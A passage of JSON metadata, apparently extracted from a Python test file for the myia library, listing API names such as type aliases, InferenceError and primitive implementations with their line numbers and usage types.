"line_number": 616, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 616, "usage_type": "name"}, {"api_name": "common.T", "line_number": 616, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 617, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 617, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 617, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 618, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 618, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 618, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 629, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 629, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 653, "usage_type": "name"}, {"api_name": "common.B", "line_number": 653, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 653, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 658, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 658, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 681, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 683, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 673, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 674, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 674, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 699, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_lt", "line_number": 701, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 690, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 690, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 691, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 692, "usage_type": "name"}, {"api_name": "common.B", "line_number": 692, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 708, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 708, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 709, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 710, "usage_type": "name"}, {"api_name": "common.B", "line_number": 710, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 732, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 733, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 733, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 736, "usage_type": "argument"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 736, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 758, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.identity", "line_number": 809, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 777, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 778, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 778, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 778, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 783, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 783, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 816, "usage_type": "name"}, {"api_name": "common.T", "line_number": 816, "usage_type": "name"}, {"api_name": "common.B", "line_number": 816, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 835, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 835, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 836, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 837, "usage_type": "name"}, {"api_name": "common.T", "line_number": 837, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_usub", "line_number": 890, "usage_type": "name"}, {"api_name": "common.B", "line_number": 863, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 863, "usage_type": "name"}, {"api_name": "common.B", "line_number": 864, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 864, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 864, "usage_type": "name"}, {"api_name": "common.B", "line_number": 865, "usage_type": "name"}, {"api_name": "common.Nil", "line_number": 865, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 865, "usage_type": "name"}, {"api_name": "common.B", "line_number": 866, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 866, "usage_type": "name"}, {"api_name": "common.B", "line_number": 867, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 867, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 867, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 867, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 899, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 913, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 913, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 929, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 930, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 946, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 957, "usage_type": "name"}, {"api_name": "common.B", "line_number": 975, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 975, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 975, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.list_map", "line_number": 1000, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 991, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 991, "usage_type": "name"}, {"api_name": "common.T", "line_number": 991, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 992, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 992, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 992, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.list_map", "line_number": 1014, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 1005, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 1006, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1006, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1006, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1023, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1023, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1018, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1018, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1019, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 1020, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1045, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1028, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1028, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1029, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1029, "usage_type": "name"}, {"api_name": "myia.dtype.Int", "line_number": 1029, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1029, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1032, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1032, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1033, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1033, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1033, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1034, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1034, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1035, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1035, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1036, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1036, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1037, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1037, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1038, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1038, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1038, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1039, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1039, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1039, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1040, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1040, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1040, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1041, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1041, "usage_type": "name"}, {"api_name": "myia.dtype.Number", "line_number": 1041, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.typeof", "line_number": 1054, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1049, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1049, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1050, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 1051, "usage_type": "argument"}, {"api_name": "common.T", "line_number": 1057, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1057, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1088, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1088, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1090, "usage_type": "call"}, {"api_name": "common.f64", "line_number": 1090, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1092, "usage_type": "call"}, {"api_name": "common.ai64", "line_number": 1092, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1094, "usage_type": "call"}, {"api_name": "common.Point_t", "line_number": 1094, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1096, "usage_type": "call"}, {"api_name": "common.Nil", "line_number": 1096, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1098, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1100, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1100, "usage_type": "argument"}, {"api_name": "myia.composite.tail", "line_number": 1101, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1102, "usage_type": "call"}, {"api_name": "common.L", "line_number": 1102, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1104, "usage_type": "call"}, {"api_name": "common.Thing_ftup", "line_number": 1104, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1062, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1063, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1063, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1064, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1065, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1066, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1066, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1067, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1067, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1067, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1069, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1069, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1069, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 1070, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1070, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1071, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1071, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 1071, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1072, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1072, "usage_type": "name"}, {"api_name": "common.Point3D_t", "line_number": 1073, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1073, "usage_type": "name"}, {"api_name": "common.Thing_ftup", "line_number": 1074, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1074, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1074, "usage_type": "name"}, {"api_name": "common.Thing_f", "line_number": 1075, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1075, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1081, "usage_type": "call"}, {"api_name": "common.Point3D", "line_number": 1082, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.list_map", "line_number": 1129, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 1114, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1114, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1115, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1115, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1115, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1116, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1116, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1116, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1116, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 1118, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1118, "usage_type": "argument"}, {"api_name": "myia.dshape.ListShape", "line_number": 1118, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1118, "usage_type": "argument"}, {"api_name": "common.L", "line_number": 1119, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1119, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1119, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 1120, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1136, "usage_type": "name"}, {"api_name": "operator.add", "line_number": 1142, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 1143, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 1148, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1153, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1153, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1154, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1154, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1154, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1169, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1169, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1170, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1170, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1170, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1193, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1194, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1194, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1195, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1195, "usage_type": "name"}, {"api_name": "myia.dtype.External", "line_number": 1196, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1196, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1196, "usage_type": "name"}, {"api_name": "myia.dtype.External", "line_number": 1204, "usage_type": "name"}, {"api_name": "types.SimpleNamespace", "line_number": 1204, "usage_type": "name"}, {"api_name": "myia.dtype.External", "line_number": 1205, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1206, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1212, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1212, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1217, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1217, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1222, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1222, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1230, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1230, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1249, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1249, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.shape", "line_number": 1258, "usage_type": "call"}, {"api_name": "common.ai16", "line_number": 1254, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1254, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1254, "usage_type": "name"}, {"api_name": "common.ai16", "line_number": 1255, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1256, "usage_type": "name"}, {"api_name": "common.ai16", "line_number": 1256, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1262, "usage_type": "call"}, {"api_name": "myia.dshape.ClassShape", "line_number": 1262, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1262, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 1263, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 1263, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1264, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 1264, "usage_type": "call"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1264, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.dot", "line_number": 1279, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1273, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1275, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 1277, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.distribute", "line_number": 1299, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1282, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1282, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1284, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1284, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1285, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1287, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1287, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1288, "usage_type": "name"}, {"api_name": "common.ai32", "line_number": 1289, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1290, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1290, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1291, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 1293, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1293, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1293, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1293, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1294, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1294, "usage_type": "name"}, {"api_name": "common.ai32", "line_number": 1294, "usage_type": "name"}, {"api_name": "common.li32", "line_number": 1295, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1295, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1295, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1295, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 1296, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1296, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.distribute", "line_number": 1309, "usage_type": "call"}, {"api_name": "common.ai32", "line_number": 1302, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1307, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.reshape", "line_number": 1321, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1312, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1312, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1313, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1313, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1314, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1315, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1315, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1316, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1317, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1317, "usage_type": "name"}, {"api_name": "common.af16", "line_number": 1317, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1318, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1318, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1319, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.transpose", "line_number": 1348, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1325, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1325, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1328, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1328, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1331, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1331, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1334, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1334, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1335, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1337, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1337, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1338, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1340, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1340, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1341, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1343, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1343, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1344, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1345, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1345, "usage_type": "name"}, {"api_name": "common.af16", "line_number": 1345, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1346, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1346, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1346, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1357, "usage_type": "call"}, {"api_name": "common.af32", "line_number": 1351, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1352, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1353, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1353, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1372, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1361, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1362, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1363, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1364, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1365, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1366, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1367, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1367, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1368, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1368, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1379, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1375, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1400, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1383, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1384, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1385, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1386, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1388, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1389, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1390, "usage_type": "argument"}, {"api_name": "myia.infer.InferenceError", "line_number": 1391, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1393, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1394, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1395, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1395, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1396, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1396, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_scan", "line_number": 1414, "usage_type": "call"}, {"api_name": "common.u64", "line_number": 1403, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1405, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1405, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1406, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1406, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1406, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1407, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1408, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1409, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_reduce", "line_number": 1452, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1419, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1419, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1419, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1420, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1420, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1421, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1421, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1421, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1421, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1425, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1425, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1429, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1429, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1429, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1430, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1433, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1433, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1434, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1437, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1437, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1438, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1441, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1441, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.list_reduce", "line_number": 1472, "usage_type": "call"}, {"api_name": "common.L", "line_number": 1457, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1457, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1458, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1458, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1458, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1458, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1461, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 1461, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1461, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1461, "usage_type": "call"}, {"api_name": "common.L", "line_number": 1464, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 1464, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1464, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1464, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1466, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.partial", "line_number": 1481, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1475, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1477, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1477, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.partial", "line_number": 1491, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.partial", "line_number": 1492, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1485, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.identity", "line_number": 1503, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1500, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.bool_and", "line_number": 1510, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1506, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1507, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1507, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1507, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1508, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1508, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1508, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.bool_or", "line_number": 1517, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1513, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1514, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1514, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1514, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1515, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1515, "usage_type": "name"}, 